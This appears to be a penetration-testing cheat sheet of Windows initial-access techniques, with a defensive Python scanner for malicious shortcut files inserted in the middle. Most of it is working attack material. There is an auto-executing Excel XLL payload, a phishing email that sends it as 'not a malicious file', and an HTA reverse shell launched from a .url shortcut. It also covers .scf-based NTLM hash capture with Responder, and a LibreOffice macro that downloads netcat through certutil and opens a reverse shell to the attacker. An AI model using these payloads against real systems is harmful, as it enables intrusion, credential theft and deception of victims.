$obj = New-Object -ComObject WScript.Shell
$link = $obj.CreateShortcut("C:\ProgramData\Calculator.lnk")
$link.TargetPath = "C:\ProgramData\rev.exe"
$link.Save()
shell.c
#include <windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void);

void __cdecl xlAutoOpen() {
    // Triggers when Excel opens
    WinExec("<POWERSHELL_3_BASE64>", 1); // Replace with your payload
}

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
1. Compile shell.c in Linux
x86_64-w64-mingw32-gcc -fPIC -shared -o shell.xll shell.c -luser32
2. Send email with the malicious xll file
swaks --to '<VICTIM>@<DOMAIN>' --from 'attacker@<DOMAIN>' --server '<DOMAIN>' --header 'This is not a malicious file' --body 'This is not a malicious file' --attach '@shell.xll'
Ref: revshells.com
1. Start a Local SMB Server
# In our local Linux machine
impacket-smbserver -smb2support share .
2. Create a Malicious hta File in local Linux SMB share
<html>
<head>
<HTA:APPLICATION ID="shell">
<script language="javascript">
var c = "<POWERSHELL_3_BASE64>";
new ActiveXObject('WScript.Shell').Run(c, 0, true);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
3. Create a shortcut file in target Windows
# In target Windows machine (powershell)
$url = "file://<LOCAL_IP>/share/shell.hta"
$shortcutPath = "C:\ProgramData\shell.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
Ref: revshells.com
If there is any interaction from the target with an SMB share:
1. Start Responder
# In our local Linux machine
sudo responder -I tun0
2. Create a malicious shortcut
[Shell]
Command=2
IconFile=\\<LOCAL_IP>\icon
3. Upload the malicious shortcut
# In our local Linux machine
smbclient -N \\\\<TARGET>\\share\\
mput evil.scf
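A defender's check for the `.url` and `.scf` shortcut files shown above, as an added example that is not part of the original page: it walks a directory tree (for example a writable file share) and reports shortcut files whose IconFile or URL value names a host outside an allow-list. The function names, the allow-list parameter and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# IconFile is fetched when Explorer lists the folder, URL when the shortcut is opened.
WATCHED_KEYS = {"iconfile", "url"}
# Remote value: UNC path (\\host\...) or a file: URL that names a host.
REMOTE = re.compile(r"^(?:\\\\|//)(?P<unc>[^\\/]+)[\\/]"
                    r"|^file:(?://|/{4,5})(?P<url>[^\\/]+)[\\/]", re.I)

def read_text(path):
    data = path.read_bytes()  # shortcut files may be UTF-16 with a BOM
    enc = "utf-16" if data[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8-sig"
    return data.decode(enc, errors="replace")

def remote_refs(text):
    """Return [(section, key, host)] for watched keys that name a remote host."""
    hits, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line and not line.startswith(";"):
            key, value = (part.strip() for part in line.split("=", 1))
            match = REMOTE.match(value)
            if key.lower() in WATCHED_KEYS and match:
                hits.append((section, key, match.group("unc") or match.group("url")))
    return hits

def scan_tree(root, allowed_hosts=()):
    """Report .scf/.url files under root that reference hosts off the allow-list."""
    allowed = {host.lower() for host in allowed_hosts}
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in (".scf", ".url"):
            for section, key, host in remote_refs(read_text(path)):
                if host.lower() not in allowed:
                    findings.append((path.name, section, key, host))
    return findings

def demo():  # constructed sample files; 192.0.2.10 is a documentation address
    samples = {
        "a.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\192.0.2.10\\icon\r\n",
        "b.url": "[InternetShortcut]\r\nURL=file://192.0.2.10/share/x.hta\r\n",
        "c.url": "[InternetShortcut]\r\nIconFile=\\\\fileserver01\\icons\\app.ico\r\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            Path(tmp, name).write_bytes(body.encode("utf-8"))
        return scan_tree(tmp, allowed_hosts=["fileserver01"])
```

Calling `demo()` returns the two constructed files that point at 192.0.2.10 and omits the one that references the allow-listed file server.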
+--------------------------------------------------------+
| 1. "Tools" > "Macros" > "Organize Macros" > "Basic..." |
| 2. "Untitled 1" > "Standard" > "New" |
| 3. "Paste the code below" |
+--------------------------------------------------------+
Sub OnLoad
shell("cmd /c certutil -urlcache -split -f http://<LOCAL_IP>/nc64.exe C:\programdata\nc64.exe && C:\programdata\nc64.exe -e cmd <LOCAL_IP> <LOCAL_PORT>")
End Sub
+-----------------------------------------------------------+
| 4. "Tools" > "Organize Macros" > "Basic..." > "Assign..." |
| 5. "Events" > "Open Document" > "OK" |
| 6. "SAVE" |
+-----------------------------------------------------------+
msfconsole -q
search badpdf
set filename evil.pdf
set lhost <LOCAL_IP>
exploit
python3 ntlm_theft.py -g all -s <LOCAL_IP> -f test
Ref: ntlm_theft